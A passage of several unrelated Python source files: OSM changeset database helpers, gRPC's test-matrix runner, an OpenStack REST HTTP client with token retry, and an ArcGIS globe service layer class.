changeset['username'].encode('utf8'), changeset['uid'],
changeset['action'], key, changeset['tags'][key],
changeset['changeset'])
cur.execute("""INSERT INTO history_keys
(wid, element, timestamp, username, userid, action, key,
value, changeset) VALUES
(%s, %s, %s, %s, %s, %s, %s, %s, %s);""", info)
conn.commit()
def add_whitelisted_user(username, reason=None, author=None, authorid=None):
"""
Add whitelisted user that is not picked up in tracking.
Inputs
------
username : str
Username to track
reason : str, optional
Reason to track user
author : str, optional
User adding tracking entry
authorid : int, optional
Userid of user adding entry
"""
conn = connect.connect()
cur = conn.cursor()
info = (username, reason, author, authorid)
cur.execute("""INSERT INTO whitelisted_users
(username, reason, author, authorid)
VALUES (%s, %s, %s, %s);""", info)
conn.commit()
def remove_whitelisted_user(username, authorid=None):
"""
Remove whitelisted user from untracked list.
Inputs
------
username : str
Username to remove
authorid : int, optional
Userid of user adding entry
"""
conn = connect.connect()
cur = conn.cursor()
info = (username, authorid)
cur.execute("""DELETE FROM whitelisted_users WHERE
username = %s and authorid = %s;""", info)
conn.commit()
def add_last_file(sequence, timestamp, timetype, read):
"""
Add information about the last state file seen.
Inputs
------
sequence : int
Sequence number of state file
timestamp : str
Stringified timestamp from file
timetype : str
Time resolution of state file
read : bool
Flag indicating if file has been read or not
"""
conn = connect.connect()
cur = conn.cursor()
cur.execute("""INSERT INTO file_list
(sequence, timestamp, timetype, read)
VALUES (%s, %s, %s, %s);""",
(sequence, timestamp, timetype, read))
conn.commit()
def get_last_file():
"""
Retrieve information about the last state file seen.
"""
conn = connect.connect()
cur = conn.cursor()
cur.execute("SELECT * FROM file_list;")
return cur.fetchone()
def update_last_file(sequence, timestamp, timetype, read):
"""
Update information about the last state file seen.
Inputs
------
sequence : int
Sequence number of state file
timestamp : str
Stringified timestamp from file
timetype : str
Time resolution of state file
read : bool
Flag indicating if file has been read or not
"""
conn = connect.connect()
cur = conn.cursor()
cur.execute("""UPDATE file_list SET
(sequence, timestamp, timetype, read)
= (%s, %s, %s, %s);""",
(sequence, timestamp, timetype, read))
conn.commit()
def remove_last_file():
"""
Remove the last file information.
"""
conn = connect.connect()
cur = conn.cursor()
cur.execute("DELETE FROM file_list;")
conn.commit()
|
|
#!/usr/bin/env python
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run test matrix."""
from __future__ import print_function
import argparse
import multiprocessing
import os
import sys
import python_utils.jobset as jobset
import python_utils.report_utils as report_utils
from python_utils.filter_pull_request_tests import filter_tests
_ROOT = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), '../..'))
os.chdir(_ROOT)
_DEFAULT_RUNTESTS_TIMEOUT = 1 * 60 * 60
# Set the timeout high to allow enough time for sanitizers and pre-building
# clang docker.
_CPP_RUNTESTS_TIMEOUT = 4 * 60 * 60
# C++ TSAN takes longer than other sanitizers
_CPP_TSAN_RUNTESTS_TIMEOUT = 8 * 60 * 60
# Set timeout high for ObjC for Cocoapods to install pods
_OBJC_RUNTESTS_TIMEOUT = 90 * 60
# Number of jobs assigned to each run_tests.py instance
_DEFAULT_INNER_JOBS = 2
# Name of the top-level umbrella report that includes all the run_tests.py invocations
# Note that the starting letter 't' matters so that the targets are listed AFTER
# the per-test breakdown items that start with 'run_tests/' (it is more readable that way)
_MATRIX_REPORT_NAME = 'toplevel_run_tests_invocations'
def _safe_report_name(name):
"""Reports with '+' in target name won't show correctly in ResultStore"""
return name.replace('+', 'p')
def _report_filename(name):
"""Generates report file name with directory structure that leads to better presentation by internal CI"""
# 'sponge_log.xml' suffix must be there for results to get recognized by kokoro.
return '%s/%s' % (_safe_report_name(name), 'sponge_log.xml')
def _matrix_job_logfilename(shortname_for_multi_target):
"""Generate location for log file that will match the sponge_log.xml from the top-level matrix report."""
# 'sponge_log.log' suffix must be there for log to get recognized as "target log"
# for the corresponding 'sponge_log.xml' report.
# the shortname_for_multi_target component must be set to match the sponge_log.xml location
# because the top-level render_junit_xml_report is called with multi_target=True
return '%s/%s/%s' % (_MATRIX_REPORT_NAME, shortname_for_multi_target,
'sponge_log.log')
def _docker_jobspec(name,
runtests_args=[],
runtests_envs={},
inner_jobs=_DEFAULT_INNER_JOBS,
timeout_seconds=None):
"""Run a single instance of run_tests.py in a docker container"""
if not timeout_seconds:
timeout_seconds = _DEFAULT_RUNTESTS_TIMEOUT
shortname = 'run_tests_%s' % name
test_job = jobset.JobSpec(cmdline=[
'python', 'tools/run_tests/run_tests.py', '--use_docker', '-t', '-j',
str(inner_jobs), '-x',
'run_tests/%s' % _report_filename(name), '--report_suite_name',
'%s' % _safe_report_name(name)
] + runtests_args,
environ=runtests_envs,
shortname=shortname,
timeout_seconds=timeout_seconds,
logfilename=_matrix_job_logfilename(shortname))
return test_job
def _workspace_jobspec(name,
runtests_args=[],
workspace_name=None,
runtests_envs={},
inner_jobs=_DEFAULT_INNER_JOBS,
timeout_seconds=None):
"""Run a single instance of run_tests.py in a separate workspace"""
if not workspace_name:
workspace_name = 'workspace_%s' % name
if not timeout_seconds:
timeout_seconds = _DEFAULT_RUNTESTS_TIMEOUT
shortname = 'run_tests_%s' % name
env = {'WORKSPACE_NAME': workspace_name}
env.update(runtests_envs)
test_job = jobset.JobSpec(cmdline=[
'bash', 'tools/run_tests/helper_scripts/run_tests_in_workspace.sh',
'-t', '-j',
str(inner_jobs), '-x',
'../run_tests/%s' % _report_filename(name), '--report_suite_name',
'%s' % _safe_report_name(name)
] + runtests_args,
environ=env,
shortname=shortname,
timeout_seconds=timeout_seconds,
logfilename=_matrix_job_logfilename(shortname))
return test_job
def _generate_jobs(languages,
configs,
platforms,
iomgr_platforms=['native'],
arch=None,
compiler=None,
labels=[],
extra_args=[],
extra_envs={},
inner_jobs=_DEFAULT_INNER_JOBS,
timeout_seconds=None):
result = []
for language in languages:
for platform in platforms:
for iomgr_platform in iomgr_platforms:
for config in configs:
name = '%s_%s_%s_%s' % (language, platform, config,
iomgr_platform)
runtests_args = [
'-l', language, '-c', config, '--iomgr_platform',
iomgr_platform
]
if arch or compiler:
name += '_%s_%s' % (arch, compiler)
runtests_args += [
'--arch', arch, '--compiler', compiler
]
if '--build_only' in extra_args:
name += '_buildonly'
for extra_env in extra_envs:
name += '_%s_%s' % (extra_env, extra_envs[extra_env])
runtests_args += extra_args
if platform == 'linux':
job = _docker_jobspec(name=name,
runtests_args=runtests_args,
runtests_envs=extra_envs,
inner_jobs=inner_jobs,
timeout_seconds=timeout_seconds)
else:
job = _workspace_jobspec(
name=name,
runtests_args=runtests_args,
runtests_envs=extra_envs,
inner_jobs=inner_jobs,
timeout_seconds=timeout_seconds)
job.labels = [platform, config, language, iomgr_platform
] + labels
result.append(job)
return result
def _create_test_jobs(extra_args=[], inner_jobs=_DEFAULT_INNER_JOBS):
test_jobs = []
# sanity tests
test_jobs += _generate_jobs(languages=['sanity'],
configs=['dbg'],
platforms=['linux'],
labels=['basictests'],
extra_args=extra_args +
['--report_multi_target'],
inner_jobs=inner_jobs)
# supported on linux only
test_jobs += _generate_jobs(languages=['php7'],
configs=['dbg', 'opt'],
platforms=['linux'],
labels=['basictests', 'multilang'],
extra_args=extra_args +
['--report_multi_target'],
inner_jobs=inner_jobs)
# supported on all platforms.
test_jobs += _generate_jobs(
languages=['c'],
configs=['dbg', 'opt'],
platforms=['linux', 'macos', 'windows'],
labels=['basictests', 'corelang'],
extra_args=
extra_args, # don't use multi_target report because C has too many test cases
inner_jobs=inner_jobs,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
# C# tests on .NET desktop/mono
test_jobs += _generate_jobs(languages=['csharp'],
configs=['dbg', 'opt'],
platforms=['linux', 'macos', 'windows'],
labels=['basictests', 'multilang'],
extra_args=extra_args +
['--report_multi_target'],
inner_jobs=inner_jobs)
# C# tests on .NET core
test_jobs += _generate_jobs(languages=['csharp'],
configs=['dbg', 'opt'],
platforms=['linux', 'macos', 'windows'],
arch='default',
compiler='coreclr',
labels=['basictests', 'multilang'],
extra_args=extra_args +
['--report_multi_target'],
inner_jobs=inner_jobs)
test_jobs += _generate_jobs(languages=['python'],
configs=['opt'],
platforms=['linux', 'macos', 'windows'],
iomgr_platforms=['native', 'gevent', 'asyncio'],
labels=['basictests', 'multilang'],
extra_args=extra_args +
['--report_multi_target'],
inner_jobs=inner_jobs)
# supported on linux and mac.
test_jobs += _generate_jobs(
languages=['c++'],
configs=['dbg', 'opt'],
platforms=['linux', 'macos'],
labels=['basictests', 'corelang'],
extra_args=
extra_args, # don't use multi_target report because C++ has too many test cases
inner_jobs=inner_jobs,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
test_jobs += _generate_jobs(languages=['grpc-node', 'ruby', 'php'],
configs=['dbg', 'opt'],
platforms=['linux', 'macos'],
labels=['basictests', 'multilang'],
extra_args=extra_args +
['--report_multi_target'],
inner_jobs=inner_jobs)
# supported on mac only.
test_jobs += _generate_jobs(languages=['objc'],
configs=['opt'],
platforms=['macos'],
labels=['basictests', 'multilang'],
extra_args=extra_args +
['--report_multi_target'],
inner_jobs=inner_jobs,
timeout_seconds=_OBJC_RUNTESTS_TIMEOUT)
# sanitizers
test_jobs += _generate_jobs(languages=['c'],
configs=['msan', 'asan', 'tsan', 'ubsan'],
platforms=['linux'],
arch='x64',
compiler='clang7.0',
labels=['sanitizers', 'corelang'],
extra_args=extra_args,
inner_jobs=inner_jobs,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
test_jobs += _generate_jobs(languages=['c++'],
configs=['asan'],
platforms=['linux'],
arch='x64',
compiler='clang7.0',
labels=['sanitizers', 'corelang'],
extra_args=extra_args,
inner_jobs=inner_jobs,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
test_jobs += _generate_jobs(languages=['c++'],
configs=['tsan'],
platforms=['linux'],
arch='x64',
compiler='clang7.0',
labels=['sanitizers', 'corelang'],
extra_args=extra_args,
inner_jobs=inner_jobs,
timeout_seconds=_CPP_TSAN_RUNTESTS_TIMEOUT)
return test_jobs
def _create_portability_test_jobs(extra_args=[],
inner_jobs=_DEFAULT_INNER_JOBS):
test_jobs = []
# portability C x86
test_jobs += _generate_jobs(languages=['c'],
configs=['dbg'],
platforms=['linux'],
arch='x86',
compiler='default',
labels=['portability', 'corelang'],
extra_args=extra_args,
inner_jobs=inner_jobs)
# portability C and C++ on x64
for compiler in [
'gcc4.9', 'gcc5.3', 'gcc7.4', 'gcc8.3', 'gcc_musl', 'clang3.5',
'clang3.6', 'clang3.7', 'clang7.0'
]:
test_jobs += _generate_jobs(languages=['c', 'c++'],
configs=['dbg'],
platforms=['linux'],
arch='x64',
compiler=compiler,
labels=['portability', 'corelang'],
extra_args=extra_args,
inner_jobs=inner_jobs,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
# portability C on Windows 64-bit (x86 is the default)
test_jobs += _generate_jobs(languages=['c'],
configs=['dbg'],
platforms=['windows'],
arch='x64',
compiler='default',
labels=['portability', 'corelang'],
extra_args=extra_args,
inner_jobs=inner_jobs)
# portability C++ on Windows
# TODO(jtattermusch): some of the tests are failing, so we force --build_only
test_jobs += _generate_jobs(languages=['c++'],
configs=['dbg'],
platforms=['windows'],
arch='default',
compiler='default',
labels=['portability', 'corelang'],
extra_args=extra_args + ['--build_only'],
inner_jobs=inner_jobs,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
# portability C and C++ on Windows using VS2017 (build only)
# TODO(jtattermusch): some of the tests are failing, so we force --build_only
test_jobs += _generate_jobs(languages=['c', 'c++'],
configs=['dbg'],
platforms=['windows'],
arch='x64',
compiler='cmake_vs2017',
labels=['portability', 'corelang'],
extra_args=extra_args + ['--build_only'],
inner_jobs=inner_jobs,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
# C and C++ with the c-ares DNS resolver on Linux
test_jobs += _generate_jobs(languages=['c', 'c++'],
configs=['dbg'],
platforms=['linux'],
labels=['portability', 'corelang'],
extra_args=extra_args,
extra_envs={'GRPC_DNS_RESOLVER': 'ares'},
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
# C and C++ with no-exceptions on Linux
test_jobs += _generate_jobs(languages=['c', 'c++'],
configs=['noexcept'],
platforms=['linux'],
labels=['portability', 'corelang'],
extra_args=extra_args,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
# TODO(zyc): Turn on this test after adding c-ares support on windows.
# C with the c-ares DNS resolver on Windows
# test_jobs += _generate_jobs(languages=['c'],
# configs=['dbg'], platforms=['windows'],
# labels=['portability', 'corelang'],
# extra_args=extra_args,
# extra_envs={'GRPC_DNS_RESOLVER': 'ares'})
# C and C++ build with cmake on Linux
# TODO(jtattermusch): some of the tests are failing, so we force --build_only
# to make sure it's buildable at least.
test_jobs += _generate_jobs(languages=['c', 'c++'],
configs=['dbg'],
platforms=['linux'],
arch='default',
compiler='cmake',
labels=['portability', 'corelang'],
extra_args=extra_args + ['--build_only'],
inner_jobs=inner_jobs)
test_jobs += _generate_jobs(languages=['python'],
configs=['dbg'],
platforms=['linux'],
arch='default',
compiler='python_alpine',
labels=['portability', 'multilang'],
extra_args=extra_args +
['--report_multi_target'],
inner_jobs=inner_jobs)
# TODO(jtattermusch): a large portion of the libuv tests is failing,
# which can end up killing the kokoro job due to gigabytes of error logs
# generated. Remove the --build_only flag
# once https://github.com/grpc/grpc/issues/17556 is fixed.
test_jobs += _generate_jobs(languages=['c'],
configs=['dbg'],
platforms=['linux'],
iomgr_platforms=['uv'],
labels=['portability', 'corelang'],
extra_args=extra_args + ['--build_only'],
inner_jobs=inner_jobs,
timeout_seconds=_CPP_RUNTESTS_TIMEOUT)
return test_jobs
def _allowed_labels():
"""Returns a list of existing job labels."""
all_labels = set()
for job in _create_test_jobs() + _create_portability_test_jobs():
for label in job.labels:
all_labels.add(label)
return sorted(all_labels)
def _runs_per_test_type(arg_str):
"""Auxiliary function to parse the "runs_per_test" flag."""
try:
n = int(arg_str)
if n <= 0: raise ValueError
return n
except:
msg = '\'{}\' is not a positive integer'.format(arg_str)
raise argparse.ArgumentTypeError(msg)
if __name__ == "__main__":
argp = argparse.ArgumentParser(
description='Run a matrix of run_tests.py tests.')
argp.add_argument('-j',
'--jobs',
default=multiprocessing.cpu_count() / _DEFAULT_INNER_JOBS,
type=int,
help='Number of concurrent run_tests.py instances.')
argp.add_argument('-f',
'--filter',
choices=_allowed_labels(),
nargs='+',
default=[],
help='Filter targets to run by label with AND semantics.')
argp.add_argument('--exclude',
choices=_allowed_labels(),
nargs='+',
default=[],
help='Exclude targets with any of given labels.')
argp.add_argument('--build_only',
default=False,
action='store_const',
const=True,
help='Pass --build_only flag to run_tests.py instances.')
argp.add_argument(
'--force_default_poller',
default=False,
action='store_const',
const=True,
help='Pass --force_default_poller to run_tests.py instances.')
argp.add_argument('--dry_run',
default=False,
action='store_const',
const=True,
help='Only print what would be run.')
argp.add_argument(
'--filter_pr_tests',
default=False,
action='store_const',
const=True,
help='Filters out tests irrelevant to pull request changes.')
argp.add_argument(
'--base_branch',
default='origin/master',
type=str,
help='Branch that pull request is requesting to merge into')
argp.add_argument('--inner_jobs',
default=_DEFAULT_INNER_JOBS,
type=int,
help='Number of jobs in each run_tests.py instance')
argp.add_argument(
'-n',
'--runs_per_test',
default=1,
type=_runs_per_test_type,
help='How many times to run each tests. >1 runs implies ' +
'omitting passing test from the output & reports.')
argp.add_argument('--max_time',
default=-1,
type=int,
help='Maximum amount of time to run tests for' +
'(other tests will be skipped)')
argp.add_argument(
'--internal_ci',
default=False,
action='store_const',
const=True,
help=
'(Deprecated, has no effect) Put reports into subdirectories to improve presentation of '
'results by Kokoro.')
argp.add_argument('--bq_result_table',
default='',
type=str,
nargs='?',
help='Upload test results to a specified BQ table.')
argp.add_argument('--extra_args',
default='',
type=str,
nargs=argparse.REMAINDER,
help='Extra test args passed to each sub-script.')
args = argp.parse_args()
extra_args = []
if args.build_only:
extra_args.append('--build_only')
if args.force_default_poller:
extra_args.append('--force_default_poller')
if args.runs_per_test > 1:
extra_args.append('-n')
extra_args.append('%s' % args.runs_per_test)
extra_args.append('--quiet_success')
if args.max_time > 0:
extra_args.extend(('--max_time', '%d' % args.max_time))
if args.bq_result_table:
extra_args.append('--bq_result_table')
extra_args.append('%s' % args.bq_result_table)
extra_args.append('--measure_cpu_costs')
if args.extra_args:
extra_args.extend(args.extra_args)
all_jobs = _create_test_jobs(extra_args=extra_args, inner_jobs=args.inner_jobs) + \
_create_portability_test_jobs(extra_args=extra_args, inner_jobs=args.inner_jobs)
jobs = []
for job in all_jobs:
if not args.filter or all(
filter in job.labels for filter in args.filter):
if not any(exclude_label in job.labels
for exclude_label in args.exclude):
jobs.append(job)
if not jobs:
jobset.message('FAILED',
'No test suites match given criteria.',
do_newline=True)
sys.exit(1)
print('IMPORTANT: The changes you are testing need to be locally committed')
print('because only the committed changes in the current branch will be')
print('copied to the docker environment or into subworkspaces.')
skipped_jobs = []
if args.filter_pr_tests:
print('Looking for irrelevant tests to skip...')
relevant_jobs = filter_tests(jobs, args.base_branch)
if len(relevant_jobs) == len(jobs):
print('No tests will be skipped.')
else:
print('These tests will be skipped:')
skipped_jobs = list(set(jobs) - set(relevant_jobs))
# Sort by shortnames to make printing of skipped tests consistent
skipped_jobs.sort(key=lambda job: job.shortname)
for job in list(skipped_jobs):
print(' %s' % job.shortname)
jobs = relevant_jobs
print('Will run these tests:')
for job in jobs:
print(' %s: "%s"' % (job.shortname, ' '.join(job.cmdline)))
print('')
if args.dry_run:
print('--dry_run was used, exiting')
sys.exit(1)
jobset.message('START', 'Running test matrix.', do_newline=True)
num_failures, resultset = jobset.run(jobs,
newline_on_success=True,
travis=True,
maxjobs=args.jobs)
# Merge skipped tests into results to show skipped tests on report.xml
if skipped_jobs:
ignored_num_skipped_failures, skipped_results = jobset.run(
skipped_jobs, skip_jobs=True)
resultset.update(skipped_results)
report_utils.render_junit_xml_report(resultset,
_report_filename(_MATRIX_REPORT_NAME),
suite_name=_MATRIX_REPORT_NAME,
multi_target=True)
if num_failures == 0:
jobset.message('SUCCESS',
'All run_tests.py instances finished successfully.',
do_newline=True)
else:
jobset.message('FAILED',
'Some run_tests.py instances have failed.',
do_newline=True)
sys.exit(1)
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 Jacob Kaplan-Moss
# Copyright 2011 OpenStack LLC
# Copyright 2011 Piston Cloud Computing, Inc.
# Copyright 2013 Alessio Ababilov
# Copyright 2013 Grid Dynamics
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
OpenStack Client interface. Handles the REST calls and responses.
"""
# E0202: An attribute inherited from %s hide this method
# pylint: disable=E0202
import logging
import time
try:
import simplejson as json
except ImportError:
import json
import requests
from automationclient.openstack.common.apiclient import exceptions
from automationclient.openstack.common import importutils
_logger = logging.getLogger(__name__)
class HTTPClient(object):
"""This client handles sending HTTP requests to OpenStack servers.
Features:
- share authentication information between several clients to different
services (e.g., for compute and image clients);
- reissue authentication request for expired tokens;
- encode/decode JSON bodies;
- raise exeptions on HTTP errors;
- pluggable authentication;
- store authentication information in a keyring;
- store time spent for requests;
- register clients for particular services, so one can use
`http_client.identity` or `http_client.compute`;
- log requests and responses in a format that is easy to copy-and-paste
into terminal and send the same request with curl.
"""
user_agent = "automationclient.openstack.common.apiclient"
def __init__(self,
auth_plugin,
region_name=None,
endpoint_type="publicURL",
original_ip=None,
verify=True,
cert=None,
timeout=None,
timings=False,
keyring_saver=None,
debug=False,
user_agent=None,
http=None):
self.auth_plugin = auth_plugin
self.endpoint_type = endpoint_type
self.region_name = region_name
self.original_ip = original_ip
self.timeout = timeout
self.verify = verify
self.cert = cert
self.keyring_saver = keyring_saver
self.debug = debug
self.user_agent = user_agent or self.user_agent
self.times = [] # [("item", starttime, endtime), ...]
self.timings = timings
# requests within the same session can reuse TCP connections from pool
self.http = http or requests.Session()
self.cached_token = None
def _http_log_req(self, method, url, kwargs):
if not self.debug:
return
string_parts = [
"curl -i",
"-X '%s'" % method,
"'%s'" % url,
]
for element in kwargs['headers']:
header = "-H '%s: %s'" % (element, kwargs['headers'][element])
string_parts.append(header)
_logger.debug("REQ: %s" % " ".join(string_parts))
if 'data' in kwargs:
_logger.debug("REQ BODY: %s\n" % (kwargs['data']))
def _http_log_resp(self, resp):
if not self.debug:
return
_logger.debug(
"RESP: [%s] %s\n",
resp.status_code,
resp.headers)
if resp._content_consumed:
_logger.debug(
"RESP BODY: %s\n",
resp.text)
def serialize(self, kwargs):
if kwargs.get('json') is not None:
kwargs['headers']['Content-Type'] = 'application/json'
kwargs['data'] = json.dumps(kwargs['json'])
try:
del kwargs['json']
except KeyError:
pass
def get_timings(self):
return self.times
def reset_timings(self):
self.times = []
def request(self, method, url, **kwargs):
"""Send an http request with the specified characteristics.
Wrapper around `requests.Session.request` to handle tasks such as
setting headers, JSON encoding/decoding, and error handling.
:param method: method of HTTP request
:param url: URL of HTTP request
:param kwargs: any other parameter that can be passed to
' requests.Session.request (such as `headers`) or `json`
that will be encoded as JSON and used as `data` argument
"""
kwargs.setdefault("headers", kwargs.get("headers", {}))
kwargs["headers"]["User-Agent"] = self.user_agent
if self.original_ip:
kwargs["headers"]["Forwarded"] = "for=%s;by=%s" % (
self.original_ip, self.user_agent)
if self.timeout is not None:
kwargs.setdefault("timeout", self.timeout)
kwargs.setdefault("verify", self.verify)
if self.cert is not None:
kwargs.setdefault("cert", self.cert)
self.serialize(kwargs)
self._http_log_req(method, url, kwargs)
if self.timings:
start_time = time.time()
resp = self.http.request(method, url, **kwargs)
if self.timings:
self.times.append(("%s %s" % (method, url),
start_time, time.time()))
self._http_log_resp(resp)
if resp.status_code >= 400:
_logger.debug(
"Request returned failure status: %s",
resp.status_code)
raise exceptions.from_response(resp, method, url)
return resp
@staticmethod
def concat_url(endpoint, url):
"""Concatenate endpoint and final URL.
E.g., "http://keystone/v2.0/" and "/tokens" are concatenated to
"http://keystone/v2.0/tokens".
:param endpoint: the base URL
:param url: the final URL
"""
return "%s/%s" % (endpoint.rstrip("/"), url.strip("/"))
def client_request(self, client, method, url, **kwargs):
"""Send an http request using `client`'s endpoint and specified `url`.
If request was rejected as unauthorized (possibly because the token is
expired), issue one authorization attempt and send the request once
again.
:param client: instance of BaseClient descendant
:param method: method of HTTP request
:param url: URL of HTTP request
:param kwargs: any other parameter that can be passed to
' `HTTPClient.request`
"""
filter_args = {
"endpoint_type": client.endpoint_type or self.endpoint_type,
"service_type": client.service_type,
}
token, endpoint = (self.cached_token, client.cached_endpoint)
just_authenticated = False
if not (token and endpoint):
try:
token, endpoint = self.auth_plugin.token_and_endpoint(
**filter_args)
except exceptions.EndpointException:
pass
if not (token and endpoint):
self.authenticate()
just_authenticated = True
token, endpoint = self.auth_plugin.token_and_endpoint(
**filter_args)
if not (token and endpoint):
raise exceptions.AuthorizationFailure(
"Cannot find endpoint or token for request")
old_token_endpoint = (token, endpoint)
kwargs.setdefault("headers", {})["X-Auth-Token"] = token
self.cached_token = token
client.cached_endpoint = endpoint
# Perform the request once. If we get Unauthorized, then it
# might be because the auth token expired, so try to
# re-authenticate and try again. If it still fails, bail.
try:
return self.request(
method, self.concat_url(endpoint, url), **kwargs)
except exceptions.Unauthorized as unauth_ex:
if just_authenticated:
raise
self.cached_token = None
client.cached_endpoint = None
self.authenticate()
try:
token, endpoint = self.auth_plugin.token_and_endpoint(
**filter_args)
except exceptions.EndpointException:
raise unauth_ex
if (not (token and endpoint) or
old_token_endpoint == (token, endpoint)):
raise unauth_ex
self.cached_token = token
client.cached_endpoint = endpoint
kwargs["headers"]["X-Auth-Token"] = token
return self.request(
method, self.concat_url(endpoint, url), **kwargs)
def add_client(self, base_client_instance):
"""Add a new instance of :class:`BaseClient` descendant.
`self` will store a reference to `base_client_instance`.
Example:
>>> def test_clients():
... from keystoneclient.auth import keystone
... from openstack.common.apiclient import client
... auth = keystone.KeystoneAuthPlugin(
... username="user", password="pass", tenant_name="tenant",
... auth_url="http://auth:5000/v2.0")
... openstack_client = client.HTTPClient(auth)
... # create nova client
... from novaclient.v1_1 import client
... client.Client(openstack_client)
... # create keystone client
... from keystoneclient.v2_0 import client
... client.Client(openstack_client)
... # use them
... openstack_client.identity.tenants.list()
... openstack_client.compute.servers.list()
"""
service_type = base_client_instance.service_type
if service_type and not hasattr(self, service_type):
setattr(self, service_type, base_client_instance)
def authenticate(self):
self.auth_plugin.authenticate(self)
# Store the authentication results in the keyring for later requests
if self.keyring_saver:
self.keyring_saver.save(self)
class BaseClient(object):
"""Top-level object to access the OpenStack API.
This client uses :class:`HTTPClient` to send requests. :class:`HTTPClient`
will handle a bunch of issues such as authentication.
"""
service_type = None
endpoint_type = None # "publicURL" will be used
cached_endpoint = None
def __init__(self, http_client, extensions=None):
self.http_client = http_client
http_client.add_client(self)
# Add in any extensions...
if extensions:
for extension in extensions:
if extension.manager_class:
setattr(self, extension.name,
extension.manager_class(self))
def client_request(self, method, url, **kwargs):
return self.http_client.client_request(
self, method, url, **kwargs)
def head(self, url, **kwargs):
return self.client_request("HEAD", url, **kwargs)
def get(self, url, **kwargs):
return self.client_request("GET", url, **kwargs)
def post(self, url, **kwargs):
return self.client_request("POST", url, **kwargs)
def put(self, url, **kwargs):
return self.client_request("PUT", url, **kwargs)
def delete(self, url, **kwargs):
return self.client_request("DELETE", url, **kwargs)
def patch(self, url, **kwargs):
return self.client_request("PATCH", url, **kwargs)
@staticmethod
def get_class(api_name, version, version_map):
"""Returns the client class for the requested API version
:param api_name: the name of the API, e.g. 'compute', 'image', etc
:param version: the requested API version
:param version_map: a dict of client classes keyed by version
:rtype: a client class for the requested API version
"""
try:
client_path = version_map[str(version)]
except (KeyError, ValueError):
msg = "Invalid %s client version '%s'. must be one of: %s" % (
(api_name, version, ', '.join(version_map.keys())))
raise exceptions.UnsupportedVersion(msg)
return importutils.import_class(client_path)
|
|
from .._abstract.abstract import BaseSecurityHandler, BaseAGSServer
from ..security.security import AGSTokenSecurityHandler
import json, types
########################################################################
class GlobeServiceLayer(BaseAGSServer):
"""
Represents a single globe layer
"""
_url = None
_proxy_url = None
_proxy_port = None
_securityHandler = None
_json = None
_json_dict = None
_extent = None
_displayField = None
_baseOption = None
_name = None
_baseID = None
_dataType = None
_fields = None
_cullMode = None
_defaultVisibility = None
_copyrightText = None
_extrusionExpression = None
_currentVersion = None
_subLayers = None
_minDistance = None
_type = None
_samplingMode = None
_maxDistance = None
_id = None
_layerFolderName = None
#----------------------------------------------------------------------
def __init__(self, url,
securityHandler=None,
proxy_url=None,
proxy_port=None,
initialize=False):
"""Constructor"""
self._url = url
self._securityHandler = securityHandler
if self._securityHandler is not None:
self._referer_url = securityHandler.referer_url
self._proxy_port = proxy_port
self._proxy_url = proxy_url
if initialize:
self.__init()
#----------------------------------------------------------------------
def __init(self):
""" inializes the properties """
params = {
"f" : "json",
}
json_dict = self._do_get(self._url, params,
securityHandler=self._securityHandler,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
self._json_dict = json_dict
self._json = json.dumps(self._json_dict)
attributes = [attr for attr in dir(self)
if not attr.startswith('__') and \
not attr.startswith('_')]
for k,v in json_dict.iteritems():
if k in attributes:
setattr(self, "_"+ k, v)
else:
print k, " - attribute not implemented for Globe Service Layer."
#----------------------------------------------------------------------
def __str__(self):
"""returns object as string"""
if self._json is None:
self.__init()
return self._json
#----------------------------------------------------------------------
def __iter__(self):
"""
returns key/value pair
"""
attributes = json.loads(str(self))
for att in attributes.items():
yield (att, getattr(self, att))
#----------------------------------------------------------------------
@property
def extent(self):
"""returns the globe layer extent"""
if self._extent is None:
self.__init()
return self._extent
#----------------------------------------------------------------------
@property
def displayField(self):
"""returns the layer's display field"""
if self._displayField is None:
self.__init()
return self._displayField
#----------------------------------------------------------------------
@property
def baseOption(self):
"""returns the base option"""
if self._baseOption is None:
self.__init()
return self._baseOption
#----------------------------------------------------------------------
@property
def name(self):
"""returns the layers' name"""
if self._name is None:
self.__init()
return self._name
#----------------------------------------------------------------------
@property
def baseID(self):
"""returns the layers' base ID"""
if self._baseID is None:
self.__init()
return self._baseID
#----------------------------------------------------------------------
@property
def dataType(self):
"""returns the data type for the layer"""
if self._dataType is None:
self.__init()
return self._dataType
#----------------------------------------------------------------------
@property
def fields(self):
"""returns the fields"""
if self._fields is None:
self.__init()
return self._fields
#----------------------------------------------------------------------
@property
def cullMode(self):
"""returns cull mode"""
if self._cullMode is None:
self.__init()
return self._cullMode
#----------------------------------------------------------------------
@property
def defaultVisibility(self):
"""returns the defaultVisibility value"""
if self._defaultVisibility is None:
self.__init()
return self._defaultVisibility
#----------------------------------------------------------------------
@property
def copyrightText(self):
"""returns the copyright text"""
if self._copyrightText is None:
self.__init()
return self._copyrightText
#----------------------------------------------------------------------
@property
def extrusionExpression(self):
"""returns the extrusionExpression value"""
if self._extrusionExpression is None:
self.__init()
return self._extrusionExpression
#----------------------------------------------------------------------
@property
def currentVersion(self):
"""returns the currentVersion value"""
if self._currentVersion is None:
self.__init()
return self._currentVersion
